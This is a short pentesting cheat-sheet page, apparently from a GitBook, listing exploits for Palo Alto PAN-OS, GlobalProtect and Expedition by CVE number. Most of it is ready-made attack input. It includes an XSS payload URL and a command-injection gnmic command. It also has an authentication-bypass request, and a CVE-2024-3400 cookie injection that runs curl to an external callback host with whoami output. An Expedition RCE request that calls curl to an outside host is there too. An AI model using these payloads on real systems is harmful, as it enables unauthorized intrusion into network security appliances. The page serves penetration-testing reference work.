Palo Alto

Palo Alto Exploits

CVE-2025-0133 - XSS

/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer

Nuclei Template:

CVE-2025-0110 - PAN-OS Command Injection

./gnmic -a <IP>:<PORT> -u <username> --password=<password> --skip-verify \
-e json_ietf subscribe --mode once --log \
--path 'pan-logging:/pan/logging/query/custom[type=$(echo system > file1; cat file1)][direction=fwd][max_logs=2][period=last-24-hrs]' 

CVE-2025-0108 - Authentication Bypass

GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css HTTP/1.1
Host: my.testing.environment
Connection: close

...

HTTP/1.1 200 OK
Date: Mon, 02 Dec 2024 02:34:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close

<html>
<head>
<title>Zero Touch Provisioning</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
...

CVE-2024-3400 Palo Alto File Write Exploit

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474

Palo Alto Global Protect

Palo Alto Networks Expedition

CVE-2024-5910 - Remotely reset the Expedition application admin credentials

CVE-2024-9463 - RCE unauthenticated

POST /API/convertCSVtoParquet.php HTTP/1.1         
Host: http://watchTowr.com         
Content-Type: application/x-www-form-urlencoded        
Content-Length: 72        

ram=watchTowr`curl+https://watchTowr.com`

Ref: https://x.com/watchtowrcyber/status/1844306954245767623?t=ibt0GSdt3qTVwHw54pdM1A&s=03

CVE-2024-9464 - Authenticated command injection vulnerability

CVE-2024-9465 - Unauthenticated SQL Injection

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

Last updated